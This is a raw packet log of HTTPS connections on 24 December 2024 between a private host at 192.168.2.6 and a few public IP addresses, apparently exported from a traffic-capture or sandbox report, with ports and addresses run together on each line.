                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.208154917 CET50054443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.208161116 CET44350054204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.208184004 CET50055443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.208194017 CET44350055204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.255940914 CET50055443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.256156921 CET50054443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.320770979 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.321029902 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.321259975 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.322316885 CET50050443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.322335005 CET4435005020.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462179899 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462831974 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462851048 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462903976 CET4435004020.189.173.2192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462929010 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.462949991 CET50040443192.168.2.620.189.173.2
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.113449097 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.113699913 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.117408991 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.117417097 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119371891 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119375944 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119435072 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119452953 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119474888 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119479895 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119529009 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119545937 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119551897 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119558096 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119627953 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119640112 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119640112 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119648933 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119661093 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119735956 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119752884 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119752884 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119765043 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119771004 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119777918 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119796038 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119805098 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119849920 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119862080 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119868040 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119872093 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119888067 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119898081 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119962931 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.119968891 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120006084 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120018005 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120064020 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120093107 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120138884 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120160103 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120170116 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120177984 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120217085 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120263100 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120281935 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120305061 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.120312929 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.167326927 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.167663097 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168023109 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168056965 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168075085 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168104887 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168122053 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168138981 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168173075 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168210030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.168237925 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215328932 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215472937 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215555906 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215578079 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215620041 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215655088 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.215672016 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.263333082 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.267024994 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.307337046 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361735106 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361818075 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361865044 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361876965 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361886978 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361892939 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361913919 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361953020 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361973047 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.361990929 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.362056971 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.407325983 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482024908 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482144117 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482182026 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482218027 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482254982 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482290030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482300043 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.523367882 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.523686886 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.571326971 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603450060 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603575945 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603586912 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603634119 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603647947 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603677034 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603712082 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603730917 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.603766918 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.607079983 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609208107 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609270096 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609385967 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.609405994 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.610938072 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648240089 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648370028 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648394108 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648431063 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648637056 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648669004 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.648694038 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.651101112 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.651130915 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.695319891 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.695512056 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726371050 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726424932 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726517916 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726661921 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.726695061 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729476929 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729593992 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729597092 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729629040 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729809999 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.729840040 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.733822107 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.733947992 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.733989954 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.735126972 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.735162973 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.735191107 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.736893892 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.736910105 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737018108 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737041950 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737226009 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737236023 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737247944 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737570047 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.738171101 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.738224030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.738341093 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.738360882 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.738390923 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.745012045 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.745099068 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.745106936 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.745137930 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.753031969 CET50051443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.753043890 CET44350051188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.756411076 CET50071443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.756436110 CET44350071188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.756513119 CET50071443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.757278919 CET50071443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.757286072 CET44350071188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.783325911 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.783457994 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.831331015 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.840734959 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.840878010 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.840919971 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.841178894 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.843456030 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.843482971 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.844146013 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.844854116 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.844980955 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.844990969 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845007896 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845041037 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845073938 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845105886 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845105886 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845135927 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845177889 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.845683098 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.846277952 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.846311092 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.846328020 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847248077 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847332001 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847378016 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847426891 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847436905 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847464085 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847544909 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847559929 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847584009 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847592115 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847609043 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847656965 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847659111 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847668886 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847681999 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847708941 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847711086 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847776890 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847810984 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.847846985 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.848079920 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.848089933 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.848160982 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849155903 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849276066 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849432945 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849507093 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849553108 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849631071 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849725008 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.849962950 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.852396011 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858160019 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858176947 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858201981 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858248949 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858264923 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858277082 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858302116 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858320951 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858331919 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858352900 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858388901 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858391047 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858407974 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858432055 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858448029 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858699083 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858707905 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858735085 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858742952 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858772993 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858795881 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858803988 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.858820915 CET50062443192.168.2.6188.245.216.205
